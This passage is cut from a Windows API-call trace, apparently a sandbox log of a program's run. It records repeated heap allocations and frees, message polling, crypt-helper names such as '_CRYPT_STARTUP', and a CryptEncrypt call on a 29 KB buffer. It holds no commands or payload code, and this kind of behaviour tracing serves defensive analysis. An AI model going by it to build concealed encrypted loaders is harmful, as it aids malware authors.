Size=0x4) returned 0x2e54f28 [0228.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0228.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0228.576] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0228.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0228.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0228.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0228.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0228.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0228.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0228.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.577] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0228.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0228.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.578] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0228.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0228.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.578] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0228.578] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0228.578] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0228.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0228.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0228.578] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0228.578] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0228.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0228.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0228.578] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.578] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.578] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.579] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0228.579] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0228.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.579] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0228.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e512f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0228.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0228.580] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0228.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0228.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f620 [0228.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0228.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0228.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0228.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0228.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0228.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0228.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0228.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0228.581] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x7128, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x7130) returned 1 [0228.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0228.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0228.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0228.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0228.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0228.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0228.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0228.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0228.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0228.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0228.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0228.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0228.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0228.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0228.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0228.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0228.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0228.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0228.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0228.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0228.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0228.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0228.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0228.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0228.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0228.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0228.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0228.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0228.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0228.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0228.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0228.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0228.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0228.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf7f08 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0228.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0228.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0228.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0228.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0228.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0228.586] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0228.586] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0228.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0228.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.586] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0228.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0228.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0228.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0228.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0228.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0228.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0228.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0228.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0228.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0228.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0228.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0228.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0228.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0228.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0228.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0228.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0228.587] CharLowerBuffW (in: lpsz="byte[28976]", cchLength=0xb | out: lpsz="byte[28976]") returned 0xb [0228.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0228.587] RtlAllocateHeap 